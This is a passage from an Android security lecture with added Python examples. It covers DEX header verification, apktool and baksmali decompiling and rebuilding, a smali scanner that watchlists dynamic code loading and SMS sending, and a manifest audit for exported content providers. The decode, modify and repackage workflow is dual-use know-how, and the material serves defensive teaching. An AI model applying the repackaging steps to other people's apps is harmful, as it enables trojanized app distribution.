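    """Return the list of header problems (empty for a consistent file)."""
    h = parse_dex_header(blob)
    problems = []
    if h["magic"] not in KNOWN_MAGIC:
        problems.append("unknown magic")
    if h["header_size"] != DEX_HEADER_SIZE:
        problems.append("bad header_size")
    if h["endian_tag"] != ENDIAN_CONSTANT:
        problems.append("bad endian_tag")
    if h["file_size"] != len(blob):
        problems.append("file_size does not match actual length")
    # checksum covers everything after the checksum field itself (offset 12..end)
    if zlib.adler32(blob[12:]) & 0xFFFFFFFF != h["checksum"]:
        problems.append("checksum mismatch")
    # signature covers everything after the signature field (offset 32..end)
    if hashlib.sha1(blob[32:]).hexdigest() != h["signature"]:
        problems.append("signature mismatch")
    return problems


def build_sample_dex(payload: bytes = b"constructed-data-section") -> bytes:
    """Constructed DEX-shaped file: valid header, empty tables, one data blob."""
    fields = [0] * 20
    fields[0] = DEX_HEADER_SIZE + len(payload)   # file_size
    fields[1] = DEX_HEADER_SIZE                  # header_size
    fields[2] = ENDIAN_CONSTANT                  # endian_tag
    fields[18] = len(payload)                    # data_size
    fields[19] = DEX_HEADER_SIZE                 # data_off
    tail = struct.pack("<20I", *fields) + payload
    signature = hashlib.sha1(tail).digest()
    checksum = zlib.adler32(signature + tail) & 0xFFFFFFFF
    return b"dex\n035\x00" + struct.pack("<I", checksum) + signature + tail


def tampered_sample_dex() -> bytes:
    """Same file with one data byte flipped and the header left untouched."""
    blob = bytearray(build_sample_dex())
    blob[-1] ^= 0x01
    return bytes(blob)


if __name__ == "__main__":
    print(parse_dex_header(build_sample_dex())["magic"], verify_dex(build_sample_dex()))
    print(verify_dex(tampered_sample_dex()))
```

Tools such as smali/baksmali and apktool recompute the checksum and signature when they rebuild a dex, so a consistent header says nothing about whether the file was repackaged; a mismatch, on the other hand, is a reliable sign that someone patched the bytes in place.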

  83. Static Analysis — smali/baksmali
    smali/baksmali: https://code.google.com/p/smali/
    smali/baksmali is an assembler/disassembler for the dex format
    used by dalvik, Android’s Java VM implementation.

  84. Static Analysis — smali/baksmali
    HelloWorld application
    $ unzip HelloWorld.apk -d hello_world
    Archive: HelloWorld.apk
    inflating: hello_world/res/layout/activity_main.xml
    inflating: hello_world/classes.dex
    ...
    $ java -jar baksmali.jar hello_world/classes.dex
    $ tree
    com
    `-- example
    `-- helloworld
    |-- BuildConfig.smali
    |-- MainActivity.smali
    |-- R$attr.smali
    |-- R$dimen.smali
    |-- R$drawable.smali
    |-- R$id.smali
    |-- R$layout.smali
    |-- R$menu.smali
    |-- R.smali
    |-- R$string.smali
    `-- R$style.smali

  85. Static Analysis — android-apktool
    apktool is based on smali/baksmali.
    https://code.google.com/p/android-apktool/
    It is a tool for reverse engineering 3rd party, closed, binary Android apps.
    It can decode resources to nearly original form and rebuild them after making some modifications; it makes it possible to debug smali code step by step.
    It also makes working with an app easier because of the project-like file structure and automation of some repetitive tasks like building the apk, etc.
    Usage of apktool
    apktool d[ecode] [OPTS] <file.apk> [<dir>]
    apktool b[uild] [OPTS] [<app_path>] [<out_file>]

  86. Static Analysis — apktool
    HelloWorld application
    $ apktool d HelloWorld.apk
    $ cat MainActivity.smali
    .class public Lcom/example/helloworld/MainActivity;
    .super Landroid/app/Activity;
    .source "MainActivity.java"
    ...
    .method protected onCreate(Landroid/os/Bundle;)V
    ...
    const-string v1, "Hello World"
    invoke-virtual {v0, v1}, Landroid/widget/TextView;->setText(Ljava/lang
    ...
    Change "Hello World" to "Hey Android".

  87. Static Analysis — apktool
    HelloWorld application
    $ apktool b HelloWorld
    $ file HelloWorld/dist/HelloWorld.apk
    HelloWorld/dist/HelloWorld.apk: Zip archive data, at least v2.0 to extract
    $ jarsigner ...
    $ zipalign ...
    $ adb install HelloWorld.apk

  88. Static Analysis — dex2jar & jd-gui
    dex2jar: reverses dex to class files and packages them into a jar.
    https://code.google.com/p/dex2jar/
    jd-gui: JD-GUI is a standalone graphical utility that displays the Java
    source code of ".class" files.
    http://jd.benow.ca/

  89. Static Analysis — androguard
    Androguard is mainly a tool written in Python for working with:
    Dex/Odex (Dalvik virtual machine) (.dex) (disassembly, decompilation),
    APK (Android application) (.apk),
    Android's binary XML (.xml),
    Android resources (.arsc).

  90. Static Analysis — androguard
    Features:
    map DEX/ODEX/APK/AXML/ARSC formats into Python objects
    disassembly, decompilation and modification of DEX/ODEX/APK
    static analysis
    ipython/Sublime Text editor integration
    similarity measurement
    visualization
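What the static tools above (baksmali, apktool, androguard) produce is smali text, and a first triage question is which framework APIs each method calls. The following is an added example, not code from the slides, apktool or androguard: a minimal scanner over smali that reports calls into a watchlist of Android API classes per calling method. The API class names are real; the sample smali is constructed from the slides' HelloWorld plus one suspicious method.

```python
# Added example (not from the slides, apktool or androguard): a minimal
# static scan over smali text from baksmali / apktool d that reports every
# call into a watchlisted Android API, per calling method. Sample is constructed.
import re
from collections import defaultdict

# Framework classes an analyst wants flagged (compare DroidBox's
# "loaded classes through DexClassLoader" and "sent SMS").
WATCHLIST = {
    "Ldalvik/system/DexClassLoader;": "dynamic code loading",
    "Landroid/telephony/SmsManager;": "SMS sending",
}
CLASS_RE = re.compile(r"^\.class\s+(?:[\w$]+\s+)*(L[^;]+;)")
METHOD_RE = re.compile(r"^\.method\s+(?:[\w$]+\s+)*([^\s(]+\([^)]*\)\S+)")
INVOKE_RE = re.compile(r"^invoke-\w+(?:/range)?\s+\{[^}]*\},\s+(L[^;]+;)->(\S+)")

def scan_smali(text):
    """Return {"Lpkg/Class;->method(...)R": [(callee_class, callee_method, why)]}."""
    hits = defaultdict(list)
    cur_class = cur_method = None
    for raw in text.splitlines():
        line = raw.strip()
        if m := CLASS_RE.match(line):
            cur_class = m.group(1)
        elif m := METHOD_RE.match(line):
            cur_method = m.group(1)
        elif line == ".end method":
            cur_method = None
        elif (m := INVOKE_RE.match(line)) and m.group(1) in WATCHLIST:
            hits[f"{cur_class}->{cur_method}"].append(
                (m.group(1), m.group(2), WATCHLIST[m.group(1)]))
    return dict(hits)


# Constructed sample: the slides' HelloWorld onCreate plus a second method
# that loads a DEX at runtime and sends an SMS.
SAMPLE_SMALI = """\
.class public Lcom/example/helloworld/MainActivity;
.method protected onCreate(Landroid/os/Bundle;)V
    const-string v1, "Hello World"
    invoke-virtual {v0, v1}, Landroid/widget/TextView;->setText(Ljava/lang/CharSequence;)V
    return-void
.end method
.method private update()V
    invoke-direct {v0, v1, v2, v3, v4}, Ldalvik/system/DexClassLoader;-><init>(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/ClassLoader;)V
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    return-void
.end method
"""
```

Running scan_smali over every .smali file under the apktool output directory gives a per-method map of sensitive calls; onCreate produces no hit here, while update() is flagged twice.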

  91. Dynamic Analysis — DroidBox
    DroidBox is developed to offer dynamic analysis of Android applications.
    Hashes for the analyzed package
    Incoming/outgoing network data
    File read and write operations
    Started services and loaded classes through DexClassLoader
    Information leaks via the network, file and SMS
    Circumvented permissions
    Cryptography operations performed using the Android API
    Listing broadcast receivers
    Sent SMS and phone calls

  92. Dynamic Analysis — TaintDroid
    TaintDroid: Tracking how apps use sensitive information required
    integrating our software into the Android platform at a low level.
    http://appanalysis.org/index.html
    Demo: http://www.youtube.com/watch?v=qnLujX1Dw4Y

  93. Online Analysis
    Anubis: generate online analysis report.
    https://anubis.iseclab.org/
    VirusTotal: cloud detection (almost all detection engines)
    https://www.virustotal.com/

  94. Outline
    1 Introduction
    2 Background
    3 Attacks
    4 Analysis Tools
    5 Defense
    Obfuscation
    Android NDK
    Security Tips
    6 Conclusion

  95. Obfuscation — ProGuard
    ProGuard is a free Java class file shrinker, optimizer, obfuscator,
    and preverifier.
    It detects and removes unused classes, fields, methods, and
    attributes.
    It optimizes bytecode and removes unused instructions.
    It renames the remaining classes, fields, and methods using
    short meaningless names.
    ProGuard can be used for Android obfuscation and is integrated into
    the Android build system.

  96. Obfuscation — ProGuard
    To enable ProGuard, set the proguard.config property in the
    /project.properties file.
    proguard.config=proguard.cfg

  97. Obfuscation — ProGuard
    Disassembling obfuscated code.
    pluginsdk
    |-- a
    |   |-- a.smali
    |   `-- b.smali
    |-- aa.smali
    |-- ab.smali
    |-- ac.smali
    |-- ad.smali
    |-- ae.smali
    |-- af.smali
    |-- ag.smali
    |-- ah.smali
    |-- ai.smali
    |-- aj.smali
    |-- ak.smali
    |-- al.smali
    |-- am.smali
    |-- an.smali
    |-- a.smali
    |-- b
    .method public final e(Ljava/lang/Class;)Lb/a
        .locals 1
        .parameter
        .prologue
        .line 45
        invoke-static {p1}, Lb/a/a/a;->f(Ljava/lang/Class;)Lb/a/a/a/a
        move-result-object v0
        iput-object v0, p0, Lb/a/a/a;->fWt:Lb/a/a/a
        .line 46
        return-object p0
    .end method

  98. Android NDK
    Android NDK: a toolset that allows you to implement parts of your
    app using native-code languages such as C and C++.
    http://developer.android.com/tools/sdk/ndk/index.html
    Native code is:
    difficult to reverse engineer
    more complex
    less portable

  99. Security Tips — Storing Data
    Using internal storage: By default, files on internal storage are
    accessible only to your app.
    avoid using the MODE_WORLD_WRITEABLE or
    MODE_WORLD_READABLE modes
    cannot limit data access to particular applications
    cannot control data format
    encrypt sensitive data

  100. Security Tips — Storing Data
    Using external storage: Files on external storage (SD Cards) are
    globally readable and writable.
    perform input validation
    avoid putting dynamic payload on external storage
    verify before loading

  101. Security Tips — Storing Data
    Using content providers: offer a structured storage mechanism
    that can be limited to your own application or exported to allow
    access by other applications.
    mark android:exported=false
    android:protectionLevel=signature
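The two content-provider tips above (android:exported=false, or a permission with android:protectionLevel=signature) can be checked mechanically on a manifest decoded by apktool d. The following is an added example, not code from the slides or from Android's own tooling; the sample manifest is constructed.

```python
# Added example (not from the slides or Android tooling): audit a manifest
# decoded by "apktool d" for content providers reachable by other apps
# without a signature-level permission. The sample manifest is constructed.
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"


def audit_providers(manifest_xml):
    """Return [(provider_name, issue)] for exported providers that are
    unguarded or guarded by a permission weaker than signature."""
    root = ET.fromstring(manifest_xml)
    # protectionLevel of each permission this app declares (default: normal)
    levels = {p.get(ANDROID_NS + "name"): p.get(ANDROID_NS + "protectionLevel", "normal")
              for p in root.iter("permission")}
    findings = []
    for prov in root.iter("provider"):
        name = prov.get(ANDROID_NS + "name")
        if prov.get(ANDROID_NS + "exported") != "true":
            continue  # android:exported="false": only this app can reach it
        guards = [prov.get(ANDROID_NS + a)
                  for a in ("permission", "readPermission", "writePermission")]
        guards = [g for g in guards if g]
        if not guards:
            findings.append((name, "exported with no permission: any app can use it"))
        for g in guards:
            level = levels.get(g, "not declared in this manifest")
            if level != "signature":
                findings.append((name, f"guarded by {g} with protectionLevel {level}"))
    return findings


# Constructed sample: one provider done right, one behind a "dangerous"
# permission that any app may request, one wide open.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.helloworld">
  <permission android:name="com.example.helloworld.READ_NOTES"
              android:protectionLevel="signature"/>
  <permission android:name="com.example.helloworld.READ_LOGS"
              android:protectionLevel="dangerous"/>
  <application>
    <provider android:name=".NotesProvider" android:exported="true"
              android:permission="com.example.helloworld.READ_NOTES"/>
    <provider android:name=".LogProvider" android:exported="true"
              android:readPermission="com.example.helloworld.READ_LOGS"/>
    <provider android:name=".CacheProvider" android:exported="true"/>
  </application>
</manifest>
"""
```

Only .LogProvider and .CacheProvider are reported; .NotesProvider passes because its guarding permission is declared at signature level.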

  102. Security Tips from developer.android.com [2]
    Storing Data
    Using permissions
    requesting permissions
    creating permissions
    Using networking
    Using IP networking
    Using telephony networking
    Performing input validation
    Handling user data
    Using WebView
    Using cryptography
    Using IPC
    Dynamically loading code
    Security in a VM
    Security in native code

  103. Conclusion I
    1 Introduction
    2 Background
    How to Build an Android Application?
    Application Fundamentals
    APK File Structure
    Android Architecture
    Android Platform Security Architecture
    Distribution Methods of Apps
    3 Attacks
    Android Malware
    Malware Distribution
    Vulnerabilities of Android OS
    Android Apps Security
    4 Analysis Tools

  104. Conclusion II
    Tools in Android SDK
    Static Analysis
    Dynamic Analysis
    Online Analysis
    5 Defense
    Obfuscation
    Android NDK
    Security Tips
    6 Conclusion

  105. References I
    Qihoo 360. Oldboot: the first bootkit on Android.
    http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-first-bootkit-on-android/.
    Android. Security Tips. http://developer.android.com/training/articles/security-tips.html.
    William Enck, Peter Gilbert, Byung-Gon Chun, Landon P. Cox, Jaeyeon Jung,
    Patrick McDaniel, and Anmol Sheth. "TaintDroid: An Information-Flow Tracking
    System for Realtime Privacy Monitoring on Smartphones." In: OSDI. Vol. 10. 2010,
    pp. 1–6.
    Adrienne Porter Felt, Helen J. Wang, Alexander Moshchuk, Steve Hanna, and
    Erika Chin. "Permission Re-Delegation: Attacks and Defenses." In: USENIX Security
    Symposium. 2011.
    Jim Huang. Android IPC Mechanism.
    http://www.slideshare.net/jserv/android-ipc-mechanism.

  106. References II
    Jim Huang. Understanding the Dalvik Virtual Machine.
    http://www.slideshare.net/jserv/understanding-the-dalvik-virtual-machine.
    Xamarin. Activity Lifecycle.
    http://docs.xamarin.com/guides/android/application_fundamentals/activity_lifecycle/.
    Lookout. Mobile Threats, Made to Measure.
    https://www.lookout.com/static/ee_images/Mobile_Threats_Made_to_Measure_Lookout_Report_2013.pdf.
    Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin. "Attacks on WebView
    in the Android System." In: Proceedings of the 27th Annual Computer Security
    Applications Conference. ACM. 2011, pp. 343–352.
    C. Enrique Ortiz. Understanding Security on Android.
    http://www.ibm.com/developerworks/library/x-androidsecurity/.
    Slashdot. Security Researcher Found the First Android Bootkit in the Wild.
    http://beta.slashdot.org/submission/3273305/security-researcher-found-the-first-android-bootkit-in-the-wild.

  107. References III
    Symantec. Mobile Adware and Malware Analysis.
    http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/madware_and_malware_analysis.pdf.
    Claud Xiao. "Android Apps Security in Practice." In: xKungfu. 2013.
    Veo Zhang. Trojanized Flappy Bird Comes on the Heels of Takedown by App Creator.
    http://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-flappy-bird-comes-on-the-heels-of-takedown-by-app-creator/.
    Yajin Zhou and Xuxian Jiang. "Dissecting Android Malware: Characterization and
    Evolution." In: Security and Privacy (SP), 2012 IEEE Symposium on. IEEE. 2012,
    pp. 95–109.